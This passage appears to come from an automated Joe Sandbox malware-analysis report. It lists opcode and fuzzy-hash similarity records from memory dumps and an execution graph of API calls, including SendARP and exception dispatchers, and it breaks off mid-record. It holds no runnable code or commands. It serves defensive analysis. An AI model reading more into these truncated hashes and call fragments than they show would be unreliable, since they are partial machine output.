                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6f64c23652b06bf45d1a97022ff45fd18ffe0dc66cfddddc7321bad6a859d0e2
                                                                                                                                                                                                                                  • Instruction ID: 4d80ca3e5e7334fea8a4ff7bdf05a51ffaa6caa4e745618dda1cdf0367f95c22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f64c23652b06bf45d1a97022ff45fd18ffe0dc66cfddddc7321bad6a859d0e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F08171A042199F8F41EBAC958069EBFF4FF49214B010179D508FB205EB31A945CBE1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5cb494c5e79a94e109f6d64180e3fdd677a6a55b034b3ccd620869e02f32b843
                                                                                                                                                                                                                                  • Instruction ID: 99ad2a0850489dd9e7f85ab7fc8db3ec9ec37942898baaff07a7e97bfb8225a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cb494c5e79a94e109f6d64180e3fdd677a6a55b034b3ccd620869e02f32b843
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1F09071A042259F4F52FB6C69115AE7BF5EFC83547110139DA49EB301EB319E028BD1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 21ff9c1e5b1ff5da53bc2dd013e27a087ac9a44045a54749cde3fac3aaf9bf5f
                                                                                                                                                                                                                                  • Instruction ID: da2da237cea858aaa1dfeee8af7c1ee0c2474b051c863b7d70859366e059f950
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ff9c1e5b1ff5da53bc2dd013e27a087ac9a44045a54749cde3fac3aaf9bf5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52012C31D0474ACBDB15CFE1C8405DEBBB2FF85304F25462AD418BB211DB70A946CB41
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 82e9ae7ce3f9b644b6e92c40a8aae248c529d2372c1b49d62feeb778568300d6
                                                                                                                                                                                                                                  • Instruction ID: 3f087cef5587ecb8d0f7bfe879185fc08eaeb882db6585439db2ce2416824709
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82e9ae7ce3f9b644b6e92c40a8aae248c529d2372c1b49d62feeb778568300d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9801DA34B4860ACBDB48EB70F46856E77B2FB843447208916D916AB784DE785C429B85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 05f83004d29af5aba173662bf97faa6d65174e8f27ce81477dff17668285f147
                                                                                                                                                                                                                                  • Instruction ID: c4406c0709578eb26979c840b47f8c642c147d443bf3d501d523d72cdb9dc5dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05f83004d29af5aba173662bf97faa6d65174e8f27ce81477dff17668285f147
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13F08775E042089F8B52EFA899906EEBBF5EF89310B00007AD508FB341EB309944CBA1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0bbc81ece070de00dcdb469beffd81aa8558aa6d9e188ac654dbcaf0085cd9c2
                                                                                                                                                                                                                                  • Instruction ID: 7191ec3251cd52364ddab4381c69f2a33a07b99d57466312d0f01b7b6688c311
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bbc81ece070de00dcdb469beffd81aa8558aa6d9e188ac654dbcaf0085cd9c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BF0A975A04229AF8F42AFB9A5446DEBBF4FF48314B01002AD509FB241EB3499448BE1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3137386787.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7bd000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 642c6882662737e50cb307ca936ad0b2a5f92612c06eea9455d55bb0f0a0c972
                                                                                                                                                                                                                                  • Instruction ID: cce4aa716073efefcdef57a333d0fb4f29cdc5a5fd15b3f43aff5146cca0b88b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 642c6882662737e50cb307ca936ad0b2a5f92612c06eea9455d55bb0f0a0c972
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F06272404344AEE7208A16D884BA2FFA8EF95734F18C45AED484B286D279AC44CAB1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d5080906a89c8117eb07bece01d8ce6b746e1ca79ba11cd8f7f1cf034bc2ad6e
                                                                                                                                                                                                                                  • Instruction ID: f3c7a59087a25ae1479428b281034abc4e7c178fa1df653f588d5e77a406e145
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5080906a89c8117eb07bece01d8ce6b746e1ca79ba11cd8f7f1cf034bc2ad6e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 700181346446059FC742EFB8E94568CBFF1AF41200F4046B9C0489BA3AEB70A95ACB82
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8eee27dd920b4b2d8e82446b3d12f7ad1f56140a4c0ef35e32cd0938eab4150b
                                                                                                                                                                                                                                  • Instruction ID: 235ee115edfa545e6b59f290c38569bfcb5b3cbd2adcd21f34776f33d624f46f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8eee27dd920b4b2d8e82446b3d12f7ad1f56140a4c0ef35e32cd0938eab4150b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F08C31E04209CE8B11EBAC9A4058EBBF2EF89214B140069D908EB206E7309E01CB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d95f8da4721700fcec0d6080439211dd2687a81db5db7364783ece5e7965943e
                                                                                                                                                                                                                                  • Instruction ID: 9e543bcbc8c5f88c384e0f2988468e4f3f6f0cdc04cc0c07d5ddcd05e05da34e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d95f8da4721700fcec0d6080439211dd2687a81db5db7364783ece5e7965943e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5018C785056819FC702EF38D850A987FF2EF46204B0081B5D009DB26AEA34AD0ACB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1fbd09a7cddb7854f85d80df4ab30b1d7852ac4358297de32d1e533fef70586a
                                                                                                                                                                                                                                  • Instruction ID: 2ec5b69699b546efac125905731dacd9019e2b66fca4c97a707cbc0ec6b5ad74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fbd09a7cddb7854f85d80df4ab30b1d7852ac4358297de32d1e533fef70586a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0E5303046314FCB136BB8942046D37D9DF876A4B1140A7DA08CF355EEA98D0187D7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: efc1bd401d045d5eecc7ccd848229dfded089660bdf538785c0287e6aef9d79d
                                                                                                                                                                                                                                  • Instruction ID: a63cc1088aa95bb119df2b7310674e5acbd41237cd62531ba9a646574d808829
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efc1bd401d045d5eecc7ccd848229dfded089660bdf538785c0287e6aef9d79d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F0587C600605AFC704EF68E941A89BBEAEF44705B1085B4D408AB329FB30AD068F91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f47b23d9dd0e526bca42cef0d803750f410fad14f82d9d84c395a0bdf76a6713
                                                                                                                                                                                                                                  • Instruction ID: 980e07cb074bc62ece1ec0b8c17ac3c6c06eb66dfb0a2cbc8b5d111445b3bf16
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f47b23d9dd0e526bca42cef0d803750f410fad14f82d9d84c395a0bdf76a6713
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F0DA34A506099FC741FFB8EA4195CBFB5EF45204B504AA4C4089B639FF70AA4A8B92
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a385912bf9974fbca2156b3f8af30552e06242081ab350566d30b2b4103c46e0
                                                                                                                                                                                                                                  • Instruction ID: fb5fdf6221a5e04eced6220db463d8aeb91c8a5c18a96ecc0b92f7b896554b6d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a385912bf9974fbca2156b3f8af30552e06242081ab350566d30b2b4103c46e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF01234B44109CBCB04EB70F45856E77B2FBC4344B108915D916DB384DF785C439B85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 25ae10f85c83443cf1dbbff68bf4adc41c6dd9e54efe1fe6271acdf2a99e464d
                                                                                                                                                                                                                                  • Instruction ID: 52172e0254392a5e8ef37884357c82bda2e517a599734aca35a47fd951901f43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25ae10f85c83443cf1dbbff68bf4adc41c6dd9e54efe1fe6271acdf2a99e464d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6E0862BB114119B9B14556C594055AA2D6E69837933E8BB1F438CF3D0FE21CC428380
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a2c2b25fc9e4a70a9db1d9166cbc77d1ccc034a5bee26e28b97f7896d258ab35
                                                                                                                                                                                                                                  • Instruction ID: 6d804452b3c2f2b6f082cac361d503ae004b7e43c20e7f4bc6b0fe41109dac67
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2c2b25fc9e4a70a9db1d9166cbc77d1ccc034a5bee26e28b97f7896d258ab35
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E0C23BF004519BDB24956CA841655B2CAE799378B3E86F1F928CF380FE21DC0243C1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e83151b860af29f1423b45a3844f4fcc25a7abd32390e7d89328b38c27e61328
                                                                                                                                                                                                                                  • Instruction ID: 6f33119d1f304e990bc7ecf24fe39cceb77f69c3884e7cb5733dcd7fffae6c89
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e83151b860af29f1423b45a3844f4fcc25a7abd32390e7d89328b38c27e61328
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCD02B29300555130958319E201143F26CFEFC6671312023AF409EB341DD94EC020BD6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d67fbd6977d7fc524871fb638bf5e257de9b74bcb68be403385d4f9bdd887067
                                                                                                                                                                                                                                  • Instruction ID: a88f6e8490831b034e6c7cdbcdfcd699bcf52cfffd66c8867f86fafaed0bd14b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d67fbd6977d7fc524871fb638bf5e257de9b74bcb68be403385d4f9bdd887067
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21E0C2323001045F8348963EF888C5BB7DAEFC952531448F9F10DC7321DD64CC018790
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f92dc4a1ae2d455e584171cb00d990c1fd6f5b7509f83c498c977fd8b9646d93
                                                                                                                                                                                                                                  • Instruction ID: 425cc0862e5116a8b020e0ebf9d221e404c23eb61628493e237bff6b1cf3286c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f92dc4a1ae2d455e584171cb00d990c1fd6f5b7509f83c498c977fd8b9646d93
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E06D70509249EFCB83DFA8D9005897BF5DE0620075000EAD144DB262EA356E04CBA2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e394e1705c07f329c83256cc607f3e2c5d421bd9e5985ffbdd2989af6162a9a8
                                                                                                                                                                                                                                  • Instruction ID: b3f5bc23c4ee5b44b2505ef4e83e5ae4025bf56fb764b0fcbec9b3b55cc05445
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e394e1705c07f329c83256cc607f3e2c5d421bd9e5985ffbdd2989af6162a9a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04D01770A01108EF8B80EFA8EA01A9EBBF9EB44300B5041ADA408E7310EA356F049B91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cb8ecaef6a551e73381f88618d4d2c47ca7ef5994da9eebcabeb423bf5e194ea
                                                                                                                                                                                                                                  • Instruction ID: 6fca3ebf3585427a879533c68cb9254f662128231ce850abd0b6e0a79cc021b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8ecaef6a551e73381f88618d4d2c47ca7ef5994da9eebcabeb423bf5e194ea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68D05E30B441188BCB00A664A41419D3B62F784344F104461C919DB284DF784D528B81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e2fb8d9dc84348d41a7da23fdaac119d9dd0d2928d9caf68ef1981ebdd09b25d
                                                                                                                                                                                                                                  • Instruction ID: 7f6c3472b9960f9ea43166ed2cc38b853a498eb98f9e8a30733f09ef16a8f2ab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2fb8d9dc84348d41a7da23fdaac119d9dd0d2928d9caf68ef1981ebdd09b25d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0C012343049068BC206FF68E9849247BE5FB80701700086CE806DB268FF61AC60EB69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dbd7b06602507023239bb2bc2855489e061c271129f6fd30a1ab8ffdd74f31d2
                                                                                                                                                                                                                                  • Instruction ID: 4eacb94a21ed4d89936e207937664817137790381fba8d1cc0ff59b4c85ec489
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbd7b06602507023239bb2bc2855489e061c271129f6fd30a1ab8ffdd74f31d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CC01230018189CAEB2027A49C68B29AF22F780709F15802DA0C28416A8E6C5944AB2F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c5995854969a333eb4a6447f8bd28a58a2f7deb8b7d4587504d762d642070eec
                                                                                                                                                                                                                                  • Instruction ID: cbd654d0454218dff104d448a3db9e63c14c6c494e82d270f05afc6fa04b8591
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5995854969a333eb4a6447f8bd28a58a2f7deb8b7d4587504d762d642070eec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FC08C30008149CAFB1027A4DC6CB29BF22FB80708F25802CE8C38416ACE6C59046B2F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3142509139.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_860000_4336.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3b550adc2d83f72538f39366c16683dcee91434c9e7e80f37f8b805c65c4d0c0
                                                                                                                                                                                                                                  • Instruction ID: d9ecb35f6b446dbdeb4db6885499f5cea393d1c17241569fae0c9c273d53050d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b550adc2d83f72538f39366c16683dcee91434c9e7e80f37f8b805c65c4d0c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78C04C704546C04FCF13AB249E1A4843B70EA0260470980E5A1148AA66DF585966DA51

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:18.1%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:90
                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                  execution_graph 28353 57a0b20 28354 57a0b42 LdrInitializeThunk 28353->28354 28356 57a0b7c 28354->28356 28357 57a5320 28358 57a5366 KiUserCallbackDispatcher 28357->28358 28360 57a53b9 28358->28360 28253 e533e8 28254 e53433 SendARP 28253->28254 28256 e53481 28254->28256 28257 c60888 28258 c608a3 28257->28258 28262 c675e6 28258->28262 28276 c67588 28258->28276 28259 c60902 28263 c675f1 28262->28263 28273 c67602 28263->28273 28290 c67f70 28263->28290 28295 c67f53 28263->28295 28300 c67e29 28263->28300 28305 c67e68 28263->28305 28310 c67f20 28263->28310 28315 c67f03 28263->28315 28320 c67ea2 28263->28320 28325 c67e85 28263->28325 28330 c67ee6 28263->28330 28335 c67e38 28263->28335 28340 c67ebf 28263->28340 28273->28259 28277 c675b7 28276->28277 28278 c67602 28277->28278 28279 c67ee6 2 API calls 28277->28279 28280 c67e85 2 API calls 28277->28280 28281 c67ea2 2 API calls 28277->28281 28282 c67f03 2 API calls 28277->28282 28283 c67f20 2 API calls 28277->28283 28284 c67e68 2 API calls 28277->28284 28285 c67e29 2 API calls 28277->28285 28286 c67f53 2 API calls 28277->28286 28287 c67f70 2 API calls 28277->28287 28288 c67ebf 2 API calls 28277->28288 28289 c67e38 2 API calls 28277->28289 28278->28259 28279->28278 28280->28278 28281->28278 28282->28278 28283->28278 28284->28278 28285->28278 28286->28278 28287->28278 28288->28278 28289->28278 28291 c67f75 28290->28291 28292 c67f8b 28291->28292 28345 57a0a6a 28291->28345 28349 57a0a7c 28291->28349 28292->28273 28296 c67f58 28295->28296 28297 c67f8b 28296->28297 28298 57a0a6a KiUserExceptionDispatcher 28296->28298 28299 57a0a7c KiUserExceptionDispatcher 28296->28299 28297->28273 28298->28297 28299->28297 28301 c67e5e 28300->28301 28302 c67f8b 28301->28302 28303 57a0a6a KiUserExceptionDispatcher 28301->28303 28304 57a0a7c KiUserExceptionDispatcher 28301->28304 28302->28273 28303->28302 28304->28302 28306 c67e6d 28305->28306 28307 c67f8b 28306->28307 28308 57a0a6a KiUserExceptionDispatcher 28306->28308 28309 57a0a7c KiUserExceptionDispatcher 28306->28309 28307->28273 28308->28307 28309->28307 28311 c67f25 28310->28311 28312 c67f8b 28311->28312 28313 57a0a6a KiUserExceptionDispatcher 28311->28313 28314 57a0a7c KiUserExceptionDispatcher 28311->28314 28312->28273 28313->28312 28314->28312 28316 c67f08 28315->28316 28317 c67f8b 28316->28317 28318 57a0a6a KiUserExceptionDispatcher 28316->28318 28319 57a0a7c KiUserExceptionDispatcher 28316->28319 28317->28273 28318->28317 28319->28317 28321 c67ea7 28320->28321 28322 c67f8b 28321->28322 28323 57a0a6a 